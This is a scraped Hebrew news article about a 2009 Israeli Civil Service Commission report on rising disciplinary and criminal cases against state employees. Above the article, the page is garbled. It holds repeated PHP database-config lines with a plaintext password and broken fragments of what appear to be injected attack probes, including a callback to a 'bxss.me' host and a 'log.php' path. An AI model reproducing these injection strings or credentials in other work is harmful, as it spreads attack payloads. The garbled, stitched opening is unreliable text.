$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> אגף המשמעת בנציבות שירות המדינה מדווח על עלייה בביצוע עבירות
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

עלייה בביצוע עבירות בקרב עובדי המדינה

תאריך: 15/11/2010 11:30   מחבר: מערכת האתר

לפי דוח שפירסם אגף המשמעת בנציבות שירות המדינה עולה כי במהלך שנת 2009 נפתחו בנציבות שירות המדינה 1090 אירועים משמעתיים כנגד עובדי המדינה – גידול של שמונה אחוזים לעומת 2008 (1,005 אירועים).

על-פי נתוני הדו"ח, הטיפול באירועים הוביל לפתיחת 401 תיקים משמעתיים (עלייה של 16% לעומת 344 תיקים ב-2008), וכן נפתחו 234 תיקים פליליים במשטרה – (עלייה של 53% לעומת 153 תיקים). לבית הדין למשמעת הוגשו 166 כתבי אישום, עלייה של 29% לעומת 128 ב-2008).

על רקע התלונה והחקירה כנגד מנכ"ל המשרד לביטחון פנים בחשד להטרה מינית ראוי לציין בנסיבות אלו כי בשנת  2009 נפתחו כ – 90 תיקים בנושאים של הטרדות מיניות (לעומת 80 תיקים בשנת 2008, עליה של כ – 12%) והוגשו כ - 19 תובענות לבית הדין למשמעת (לעומת 11 תובענות בשנת 2008, עליה של כ – 72%)

לפי המדיניות הננקטת על ידי נציבות שירות המדינה השעיית עובד שטרם הוגש נגדו כתב אישום , מוגבלת לפרק זמן של מספר חודשים עד לקבלת החלטה סופית בעניינו של העובד החשוד. בכל מקרה מדווחת הנציבות בדוח שלה כי בשנת 2009 הושעו 74 עובדים (חלקם פוטרו או הוחזרו למעגל העבודה). נכון לסוף שנת 2009, ישנם כ - 110 עובדים מושעים (גם משנים עברו) וכ - 21 עובדים המועברים מתפקידם.